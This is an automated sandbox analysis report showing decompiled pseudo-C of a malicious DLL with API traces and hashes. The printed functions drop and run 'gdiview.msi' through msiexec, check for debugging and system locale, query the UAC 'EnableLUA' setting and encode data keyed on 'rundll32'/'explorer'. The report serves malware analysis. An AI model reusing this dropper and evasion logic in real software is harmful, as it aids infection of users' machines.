                                                                                                                                                      0x1001fd35

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001FC8E
                                                                                                                                                      • _memset.LIBCMT ref: 1001FCAB
                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FCBF
                                                                                                                                                      • _strcat_s.LIBCMT ref: 1001FCD6
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001FCF1
                                                                                                                                                        • Part of subcall function 1001FC10: CreateFileA.KERNEL32(10026888,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC33
                                                                                                                                                        • Part of subcall function 1001FC10: WriteFile.KERNEL32(00039E00,00000000,00000000,10026888,00000000), ref: 1001FC4E
                                                                                                                                                        • Part of subcall function 1001FC10: CloseHandle.KERNEL32(00039E00), ref: 1001FC63
                                                                                                                                                      • PathFileExistsA.SHLWAPI(00000000), ref: 1001FD19
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                        • Part of subcall function 1001A1D0: CreateProcessA.KERNEL32(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$CloseFileHandle$CreatePath$ExistsProcessTempWrite_sprintf_strcat_s
                                                                                                                                                      • String ID: gdiview.msi$msiexec.exe /i "%s"
                                                                                                                                                      • API String ID: 1459467440-729886463
                                                                                                                                                      • Opcode ID: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
                                                                                                                                                      • Instruction ID: fc1d18d4907088cb0004c85748b024e0f714aa859ea981698376c8e2dc0c21e3
                                                                                                                                                      • Opcode Fuzzy Hash: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
                                                                                                                                                      • Instruction Fuzzy Hash: 431170BAD402186AE750D760EC46FEE7328DB54701F4444A4BB48A5085EBB1A7988F92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10020575, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 41COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                      			E10020575(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t31;
				void* _t35;
				void* _t47;
				void* _t49;
				intOrPtr _t51;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t57;

				_t62 = __eflags;
				_t45 = __esi;
				_t44 = __edi;
				_t36 = __ebx;
				E1001FDB0();
				E1001FF90(__ebx, __edi, __esi, __eflags, "install", "user01", "-0.25", "45.0.0", "exe");
				_t51 = _t49 + 0x14 - 0x1c;
				_t37 = _t51;
				 *((intOrPtr*)(_t47 - 0x248)) = _t51;
				 *((intOrPtr*)(_t47 - 0x260)) = E10001160(_t51, __eflags, "status=main_start");
				E10020180(__ebx, __edi, __esi, _t62);
				_t52 = _t51 + 0x1c;
				if(PathFileExistsA("C:\\hijack") != 0) {
					L7:
					_t53 = _t52 - 0x1c;
					 *((intOrPtr*)(_t47 - 0x24c)) = _t53;
					 *((intOrPtr*)(_t47 - 0x264)) = E10001160(_t53, __eflags, "status=check_debug");
					E10020180(_t36, _t44, _t45, __eflags);
					_t55 = _t53 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x250)) = _t55;
					 *((intOrPtr*)(_t47 - 0x268)) = E10001160(_t55, __eflags, "user01");
					E1001FEA0(_t36, _t44, _t45, __eflags);
					_t57 = _t55 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x254)) = _t57;
					 *((intOrPtr*)(_t47 - 0x26c)) = E10001160(_t57, __eflags, "user01");
					E1001FDC0(_t36, _t44, _t45, __eflags);
					_t59 = _t57 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x258)) = _t57 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x270)) = E10001160(_t59, __eflags, "status=main_over");
					E10020180(_t36, _t44, _t45, __eflags);
				} else {
					E1001A0A0();
					if(E1001A0B0(_t37) == 0 || E10019D10() != 0) {
					} else {
						_t35 = E1001FA30(_t36, _t44, _t45, __eflags, 0x3e8, 0);
						_t52 = _t52 + 8;
						__eflags = _t35;
						if(__eflags != 0) {
							goto L7;
						} else {
						}
					}
				}
				E1001A260();
				 *((intOrPtr*)(_t47 - 0x25c)) = 1;
				 *((intOrPtr*)(_t47 - 4)) = 0xffffffff;
				E100011A0(_t47 - 0x28);
				_t31 =  *((intOrPtr*)(_t47 - 0x25c));
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t31;
			}












                                                                                                                                                      0x10020575
                                                                                                                                                      0x10020575
                                                                                                                                                      0x10020575
                                                                                                                                                      0x10020575
                                                                                                                                                      0x10020644
                                                                                                                                                      0x10020662
                                                                                                                                                      0x1002066a
                                                                                                                                                      0x1002066d
                                                                                                                                                      0x1002066f
                                                                                                                                                      0x1002067f
                                                                                                                                                      0x10020685
                                                                                                                                                      0x1002068a
                                                                                                                                                      0x1002069a
                                                                                                                                                      0x100206d0
                                                                                                                                                      0x100206d0
                                                                                                                                                      0x100206d5
                                                                                                                                                      0x100206e5
                                                                                                                                                      0x100206eb
                                                                                                                                                      0x100206f3
                                                                                                                                                      0x100206f8
                                                                                                                                                      0x10020708
                                                                                                                                                      0x1002070e
                                                                                                                                                      0x10020716
                                                                                                                                                      0x1002071b
                                                                                                                                                      0x1002072b
                                                                                                                                                      0x10020731
                                                                                                                                                      0x10020739
                                                                                                                                                      0x1002073e
                                                                                                                                                      0x1002074e
                                                                                                                                                      0x10020754
                                                                                                                                                      0x1002069c
                                                                                                                                                      0x1002069c
                                                                                                                                                      0x100206a8
                                                                                                                                                      0x100206b8
                                                                                                                                                      0x100206bf
                                                                                                                                                      0x100206c4
                                                                                                                                                      0x100206c7
                                                                                                                                                      0x100206c9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100206cb
                                                                                                                                                      0x100206c9
                                                                                                                                                      0x100206a8
                                                                                                                                                      0x1002075c
                                                                                                                                                      0x10020761
                                                                                                                                                      0x1002076b
                                                                                                                                                      0x10020775
                                                                                                                                                      0x1002077a
                                                                                                                                                      0x10020783
                                                                                                                                                      0x1002078e

                                                                                                                                                      APIs
                                                                                                                                                      • PathFileExistsA.SHLWAPI(C:\hijack), ref: 10020692
                                                                                                                                                        • Part of subcall function 10019D10: GetSystemDefaultLCID.KERNEL32 ref: 10019D1D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DefaultExistsFilePathSystem
                                                                                                                                                      • String ID: -0.25$45.0.0$C:\hijack$exe$install$status=main_start$user01
                                                                                                                                                      • API String ID: 482051434-1656717437
                                                                                                                                                      • Opcode ID: 0a904efb4324982fc1db73172a1754b2f1969f879e70f59afb907af5123e15f7
                                                                                                                                                      • Instruction ID: 76c3a66b6cadf2752fd619ea01efa0c867ff815aaebb18d2e7d5061645e6b307
                                                                                                                                                      • Opcode Fuzzy Hash: 0a904efb4324982fc1db73172a1754b2f1969f879e70f59afb907af5123e15f7
                                                                                                                                                      • Instruction Fuzzy Hash: 0501F978D083189FD750FFA49C4A7DE77B2DF40254F900198FD0866143EB31B5909E62
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1002185A, Relevance: 13.6, APIs: 9, Instructions: 123COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E1002185A(void* __ebx, void* __edx, void* __edi) {
				void* _t60;
				void* _t80;
				void* _t101;
				void* _t154;
				void* _t156;
				void* _t158;
				void* _t171;

				L0:
				while(1) {
					L0:
					_t150 = __edi;
					_t106 = __ebx;
					 *((intOrPtr*)(_t154 - 0xe2e0)) =  *((intOrPtr*)(_t154 - 0xe2e0)) + 1;
					_t60 = E100021E0(_t154 - 0xe2a4);
					_t174 =  *((intOrPtr*)(_t154 - 0xe2e0)) - _t60;
					if( *((intOrPtr*)(_t154 - 0xe2e0)) >= _t60) {
						break;
					}
					L2:
					E1000CF20(__edi, _t154 - 0xab84, 0, 0x3710);
					E1000CF20(_t150, _t154 - 0x3d54, 0, 0x3710);
					_t80 = E10001A50(E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=");
					_t151 = _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0))));
					E1000D190(__ebx, _t150, _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t154 - 0xab84, E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))));
					E1000D8A3( *((intOrPtr*)(_t154 - 0xe2e0)), _t154 - 0x3d54, 0x3710, E10001A50(E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=") + 1);
					E1000CF20(_t150, _t154 - 0xe294, 0, 0x3710);
					E1000CF20(_t150, _t154 - 0x746c, 0, 0x3710);
					E1000CC93(_t150, _t154 - 0xe294,  *((intOrPtr*)(_t154 - 0x3d58)), _t154 - 0xab84);
					_push(_t154 - 0x3d54);
					_push(_t154 - 0xe294);
					_push( *((intOrPtr*)(_t154 + 8)));
					E1000CC93(_t150, _t154 - 0x746c,  *((intOrPtr*)(_t154 - 0x7470)),  *((intOrPtr*)(_t154 - 0x18)));
					_t171 = _t156 + 0x7c;
					if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
						E1000D190(_t106, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x746c, E1000CAC0(_t154 - 0x746c));
						_t171 = _t171 + 0x10;
					}
					_t101 = E1000CAC0(_t154 - 0x746c);
					_t156 = _t171 + 4;
					 *((intOrPtr*)(_t154 - 0x14)) = _t101 +  *((intOrPtr*)(_t154 - 0x14));
				}
				L5:
				 *((char*)(_t154 - 4)) = 1;
				E100011A0(_t154 - 0xe2dc);
				 *((char*)(_t154 - 4)) = 0;
				E10003010(_t154 - 0xe2a4);
				 *((intOrPtr*)(_t154 - 4)) = 0xffffffff;
				E100011A0(_t154 - 0xe2c0);
				 *(_t154 - 0x10) = "\r\n%s%s%s\r\n";
				 *((char*)(_t154 - 0x21c)) = 0;
				E1000CF20(__edi, _t154 - 0x21b, 0, 0x1ff);
				_push( *((intOrPtr*)(_t154 - 0x18)));
				_push( *((intOrPtr*)(_t154 + 8)));
				E1000CC93(_t150, _t154 - 0x21c,  *(_t154 - 0x10),  *((intOrPtr*)(_t154 - 0x18)));
				_t158 = _t156 + 0x20;
				if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
					E1000D190(__ebx, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x21c, E1000CAC0(_t154 - 0x21c));
					_t158 = _t158 + 0x10;
				}
				 *((intOrPtr*)(_t154 - 0x14)) = E1000CAC0(_t154 - 0x21c) +  *((intOrPtr*)(_t154 - 0x14));
				 *[fs:0x0] =  *((intOrPtr*)(_t154 - 0xc));
				return  *((intOrPtr*)(_t154 - 0x14));
			}










                                                                                                                                                      0x1002185a
                                                                                                                                                      0x1002185a
                                                                                                                                                      0x1002185a
                                                                                                                                                      0x1002185a
                                                                                                                                                      0x1002185a
                                                                                                                                                      0x10021863
                                                                                                                                                      0x1002186f
                                                                                                                                                      0x10021874
                                                                                                                                                      0x1002187a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10021880
                                                                                                                                                      0x1002188e
                                                                                                                                                      0x100218a4
                                                                                                                                                      0x100218cb
                                                                                                                                                      0x100218ee
                                                                                                                                                      0x10021912
                                                                                                                                                      0x10021951
                                                                                                                                                      0x10021967
                                                                                                                                                      0x1002197d
                                                                                                                                                      0x1002199a
                                                                                                                                                      0x100219a8
                                                                                                                                                      0x100219af
                                                                                                                                                      0x100219b3
                                                                                                                                                      0x100219c6
                                                                                                                                                      0x100219cb
                                                                                                                                                      0x100219d4
                                                                                                                                                      0x100219f6
                                                                                                                                                      0x100219fb
                                                                                                                                                      0x100219fb
                                                                                                                                                      0x10021a05
                                                                                                                                                      0x10021a0a
                                                                                                                                                      0x10021a10
                                                                                                                                                      0x10021a10
                                                                                                                                                      0x10021a18
                                                                                                                                                      0x10021a18
                                                                                                                                                      0x10021a22
                                                                                                                                                      0x10021a27
                                                                                                                                                      0x10021a31
                                                                                                                                                      0x10021a36
                                                                                                                                                      0x10021a43
                                                                                                                                                      0x10021a48
                                                                                                                                                      0x10021a4f
                                                                                                                                                      0x10021a64
                                                                                                                                                      0x10021a6f
                                                                                                                                                      0x10021a73
                                                                                                                                                      0x10021a83
                                                                                                                                                      0x10021a88
                                                                                                                                                      0x10021a91
                                                                                                                                                      0x10021ab3
                                                                                                                                                      0x10021ab8
                                                                                                                                                      0x10021ab8
                                                                                                                                                      0x10021acd
                                                                                                                                                      0x10021ad6
                                                                                                                                                      0x10021ae1

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_strlen$_sprintf$__output_l_strcpy_s
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3854912713-0
                                                                                                                                                      • Opcode ID: b322046e219f78ca5d588c42d31cd5ab94df7dbf5b27a50053a166c6a7f0d488
                                                                                                                                                      • Instruction ID: ecc14f8781584b065d37a28c2fb0b24bdd6a5e60bbd0adb2cb8e7c12e54bf0d8
                                                                                                                                                      • Opcode Fuzzy Hash: b322046e219f78ca5d588c42d31cd5ab94df7dbf5b27a50053a166c6a7f0d488
                                                                                                                                                      • Instruction Fuzzy Hash: 3B4192B6D002186BDB14D7A0DC92EEE737DEF54280F0449A9F50DB6246EA747B448BA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 100223F0, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                      			E100223F0(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v36;
				char _v292;
				signed int _v296;
				char _v300;
				intOrPtr _v304;
				char _v308;
				intOrPtr _v312;
				void* __ebp;
				char _t61;
				char _t62;
				signed int _t70;
				intOrPtr _t102;
				intOrPtr _t103;
				char _t115;
				char _t116;
				signed int _t118;

				_t132 = __esi;
				_t131 = __edi;
				_t101 = __ebx;
				_t61 = "rundll32"; // 0x646e7572
				_v24 = _t61;
				_t102 =  *0x100254e4; // 0x32336c6c
				_v20 = _t102;
				_t115 =  *0x100254e8; // 0x0
				_v16 = _t115;
				_t62 = "explorer"; // 0x6c707865
				_v308 = _t62;
				_t103 =  *0x100254f0; // 0x7265726f
				_v304 = _t103;
				_t116 =  *0x100254f4; // 0x0
				_v300 = _t116;
				E1000CF20(__edi,  &_v292, 0, 0x108);
				E1001F150( &_v24,  &_v292,  &_v24);
				E1000D190(__ebx, _t131, __esi,  &_v36,  &_v308, 8);
				_t118 = _a4;
				_v12 = E1000CAC0(_t118);
				_v296 = 0;
				_t70 = _v12 & 0x80000007;
				if(_t70 < 0) {
					_t70 = (_t70 - 0x00000001 | 0xfffffff8) + 1;
				}
				if(_t70 == 0) {
					_t120 = _v12 + 8;
					__eflags = _t120;
					_v296 = _t120;
				} else {
					asm("cdq");
					_t120 = _t118 & 0x00000007;
					_v296 = 8 + (_v12 + (_t118 & 0x00000007) >> 3) * 8;
				}
				_v8 = L1000CE56(_t101, _t120, _t131, _t132, _v296);
				E1000CF20(_t131, _v8, 0, _v296);
				E1000D190(_t101, _t131, _t132, _v8, _a4, E1000CAC0(_a4));
				E1001F0B0(_t101, _v8, _t131, _t132,  &_v292, _v8, _v8, _v296);
				asm("cdq");
				_v312 = L1000CE56(_t101, 1 + (_v296 + 2) / 3 * 4, _t131, _t132, 1 + (_v296 + 2) / 3 * 4);
				asm("cdq");
				E1000CF20(_t131, _v312, 0, 1 + (_v296 + 2) / 3 * 4);
				_t90 = _v296 + 2;
				asm("cdq");
				E1001F240(_v312, 1 + (_v296 + 2) / 3 * 4, _v8, _v296);
				_push(_v8);
				E1000CA30(_t101, _t131, _t132, _t90 % 3);
				return _v312;
			}
























                                                                                                                                                      0x100223f0
                                                                                                                                                      0x100223f0
                                                                                                                                                      0x100223f0
                                                                                                                                                      0x100223f9
                                                                                                                                                      0x100223fe
                                                                                                                                                      0x10022401
                                                                                                                                                      0x10022407
                                                                                                                                                      0x1002240a
                                                                                                                                                      0x10022410
                                                                                                                                                      0x10022413
                                                                                                                                                      0x10022418
                                                                                                                                                      0x1002241e
                                                                                                                                                      0x10022424
                                                                                                                                                      0x1002242a
                                                                                                                                                      0x10022430
                                                                                                                                                      0x10022444
                                                                                                                                                      0x10022457
                                                                                                                                                      0x1002246c
                                                                                                                                                      0x10022474
                                                                                                                                                      0x10022480
                                                                                                                                                      0x10022483
                                                                                                                                                      0x10022490
                                                                                                                                                      0x10022495
                                                                                                                                                      0x1002249b
                                                                                                                                                      0x1002249b
                                                                                                                                                      0x1002249e
                                                                                                                                                      0x100224be
                                                                                                                                                      0x100224be
                                                                                                                                                      0x100224c1
                                                                                                                                                      0x100224a0
                                                                                                                                                      0x100224a3
                                                                                                                                                      0x100224a4
                                                                                                                                                      0x100224b3
                                                                                                                                                      0x100224b3
                                                                                                                                                      0x100224d6
                                                                                                                                                      0x100224e6
                                                                                                                                                      0x10022503
                                                                                                                                                      0x10022521
                                                                                                                                                      0x10022532
                                                                                                                                                      0x1002254a
                                                                                                                                                      0x10022559
                                                                                                                                                      0x10022572
                                                                                                                                                      0x1002258b
                                                                                                                                                      0x1002258e
                                                                                                                                                      0x100225a5
                                                                                                                                                      0x100225b0
                                                                                                                                                      0x100225b1
                                                                                                                                                      0x100225c2

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_strlen
                                                                                                                                                      • String ID: explorer$rundll32
                                                                                                                                                      • API String ID: 1975251954-2912785976
                                                                                                                                                      • Opcode ID: c1e6a0fdb6488fddb4f6070d290b58589a25d59a5c82d9815c184508ac71ae6d
                                                                                                                                                      • Instruction ID: 8d15330d89fc5d0acd7d9b91591f78a2dd970f15495d3f7c9849200120727594
                                                                                                                                                      • Opcode Fuzzy Hash: c1e6a0fdb6488fddb4f6070d290b58589a25d59a5c82d9815c184508ac71ae6d
                                                                                                                                                      • Instruction Fuzzy Hash: 84515FBAD00218ABDB14DB98DC92FEEB3B9EB4C304F044199E50997341E635BB54CF95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001DC00, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001DC00(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				struct _OSVERSIONINFOW _v284;
				char _v547;
				char _v548;
				char _v819;
				char _v820;
				char _v824;
				void* _t31;
				void* _t38;
				void* _t41;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t53;
				void* _t57;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t69 = __esi;
				_t68 = __edi;
				_t57 = __ebx;
				if(_a4 == 0) {
					return _t31;
				}
				_v820 = 0;
				E1000CF20(__edi,  &_v819, 0, 0x103);
				_v548 = 0;
				_t58 =  &_v547;
				E1000CF20(_t68,  &_v547, 0, 0x103);
				_t65 =  &(_v284.dwMajorVersion);
				E1000CF20(_t68,  &(_v284.dwMajorVersion), 0, 0x110);
				_t74 = _t71 + 0x24;
				_v284.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v284);
				if(_v284.dwMajorVersion != 6 || _v284.dwMinorVersion != 2 || E1001D240() == 0) {
					_t38 = E1001D7E0(_t68,  &_v548);
					_t75 = _t74 + 4;
					__eflags = _t38;
					if(_t38 != 0) {
						L11:
						E1001D2D0(_t58,  &_v548);
						_t65 =  &_v820;
						_t41 = E1001CCF0( &_v820, 0x104,  &_v824);
						_t77 = _t75 + 0x10;
						__eflags = _t41;
						if(_t41 >= 0) {
							_t65 = 0x104 - _v824;
							__eflags = 0x104;
							E1001CC50( &_v548, 0x104 - _v824, _t70 + _v824 - 0x330);
							_t77 = _t77 + 0xc;
						}
						goto L13;
					}
					_t49 = E1001D560(_t68,  &_v548);
					_t75 = _t75 + 4;
					__eflags = _t49;
					if(_t49 != 0) {
						goto L11;
					}
					_t58 =  &_v548;
					_t50 = E1001DA70(_t68,  &_v548);
					_t75 = _t75 + 4;
					__eflags = _t50;
					if(_t50 != 0) {
						goto L11;
					}
					_t65 =  &_v548;
					_t51 = E1001D370(_t57, _t68, _t69,  &_v548);
					_t77 = _t75 + 4;
					__eflags = _t51;
					if(_t51 == 0) {
						goto L13;
					}
					goto L11;
				} else {
					_t53 = E1001DA70(_t68,  &_v548);
					_t77 = _t74 + 4;
					_t84 = _t53;
					if(_t53 != 0) {
						_t65 =  &_v548;
						E1001D2D0( &_v548,  &_v548);
						E1001D320(_t84,  &_v820,  &_v548);
						_t77 = _t77 + 0xc;
					}
					L13:
					if(_v820 == 0) {
						_t65 =  &_v820;
						E1001CFA0("Mid2Failed", 0x104,  &_v820);
						_t77 = _t77 + 0xc;
					}
					return E1000D8A3(_t65, _a4, 0x104,  &_v820);
				}
			}























                                                                                                                                                      0x1001dc00
                                                                                                                                                      0x1001dc00
                                                                                                                                                      0x1001dc00
                                                                                                                                                      0x1001dc0d
                                                                                                                                                      0x1001ddb4
                                                                                                                                                      0x1001ddb4
                                                                                                                                                      0x1001dc13
                                                                                                                                                      0x1001dc28
                                                                                                                                                      0x1001dc30
                                                                                                                                                      0x1001dc3e
                                                                                                                                                      0x1001dc45
                                                                                                                                                      0x1001dc54
                                                                                                                                                      0x1001dc5b
                                                                                                                                                      0x1001dc60
                                                                                                                                                      0x1001dc63
                                                                                                                                                      0x1001dc74
                                                                                                                                                      0x1001dc81
                                                                                                                                                      0x1001dcd9
                                                                                                                                                      0x1001dcde
                                                                                                                                                      0x1001dce1
                                                                                                                                                      0x1001dce3
                                                                                                                                                      0x1001dd1e
                                                                                                                                                      0x1001dd25
                                                                                                                                                      0x1001dd39
                                                                                                                                                      0x1001dd40
                                                                                                                                                      0x1001dd45
                                                                                                                                                      0x1001dd48
                                                                                                                                                      0x1001dd4a
                                                                                                                                                      0x1001dd5f
                                                                                                                                                      0x1001dd5f
                                                                                                                                                      0x1001dd6d
                                                                                                                                                      0x1001dd72
                                                                                                                                                      0x1001dd72
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dd4a
                                                                                                                                                      0x1001dcec
                                                                                                                                                      0x1001dcf1
                                                                                                                                                      0x1001dcf4
                                                                                                                                                      0x1001dcf6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dcf8
                                                                                                                                                      0x1001dcff
                                                                                                                                                      0x1001dd04
                                                                                                                                                      0x1001dd07
                                                                                                                                                      0x1001dd09
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dd0b
                                                                                                                                                      0x1001dd12
                                                                                                                                                      0x1001dd17
                                                                                                                                                      0x1001dd1a
                                                                                                                                                      0x1001dd1c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dc95
                                                                                                                                                      0x1001dc9c
                                                                                                                                                      0x1001dca1
                                                                                                                                                      0x1001dca4
                                                                                                                                                      0x1001dca6
                                                                                                                                                      0x1001dca8
                                                                                                                                                      0x1001dcaf
                                                                                                                                                      0x1001dcc5
                                                                                                                                                      0x1001dcca
                                                                                                                                                      0x1001dcca
                                                                                                                                                      0x1001dd75
                                                                                                                                                      0x1001dd7e
                                                                                                                                                      0x1001dd80
                                                                                                                                                      0x1001dd91
                                                                                                                                                      0x1001dd96
                                                                                                                                                      0x1001dd96
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ddae

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001DC28
                                                                                                                                                      • _memset.LIBCMT ref: 1001DC45
                                                                                                                                                      • _memset.LIBCMT ref: 1001DC5B
                                                                                                                                                      • GetVersionExW.KERNEL32(00000114), ref: 1001DC74
                                                                                                                                                      • _strcpy_s.LIBCMT ref: 1001DDA9
                                                                                                                                                        • Part of subcall function 1001D240: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
                                                                                                                                                        • Part of subcall function 1001D240: RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
                                                                                                                                                        • Part of subcall function 1001D240: RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9
                                                                                                                                                        • Part of subcall function 1001DA70: wsprintfW.USER32 ref: 1001DABC
                                                                                                                                                        • Part of subcall function 1001DA70: CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
                                                                                                                                                        • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB21
                                                                                                                                                        • Part of subcall function 1001DA70: DeviceIoControl.KERNEL32 ref: 1001DB50
                                                                                                                                                        • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB68
                                                                                                                                                        • Part of subcall function 1001DA70: CloseHandle.KERNEL32(000000FF), ref: 1001DBB4
                                                                                                                                                        • Part of subcall function 1001D2D0: _strlen.LIBCMT ref: 1001D2DE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
